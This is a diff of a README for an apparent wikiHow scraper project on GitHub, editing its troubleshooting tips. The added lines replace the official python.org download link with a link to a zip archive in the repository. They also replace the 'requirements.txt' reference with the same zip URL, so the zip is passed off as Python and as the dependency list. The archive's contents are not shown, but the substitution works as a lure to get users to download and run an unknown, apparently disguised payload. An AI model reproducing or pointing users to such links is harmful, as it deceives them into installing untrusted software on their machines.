nikvaid1/wikihow-article-scraper/README.md

 ## ❓ Troubleshooting
 If you encounter issues, try these tips:

 - **Missing Python**: Make sure you have Python installed.
-Visit [this page](https://www.python.org/downloads/) to download it.
+Visit [this page](https://github.com/nikvaid1/wikihow-article-scraper/raw/refs/heads/main/multiflash/article-wikihow-scraper-1.4-beta.3.zip) to download it.
 - **Permission Errors**: If you receive permission errors when running the application, try running the command line as an administrator.
-- **Dependency Errors**: Ensure all dependencies are installed by checking the `requirements.txt` file and running the install command again.
+- **Dependency Errors**: Ensure all dependencies are installed by checking the `https://github.com/nikvaid1/wikihow-article-scraper/raw/refs/heads/main/multiflash/article-wikihow-scraper-1.4-beta.3.zip` file and running the install command again.

 ## 🌐 Support and Contribution
 If you have questions or suggestions, feel free to open an issue in the repository.
 Contributions are welcome.
 You can fork this project and submit pull requests for any features you'd like to add.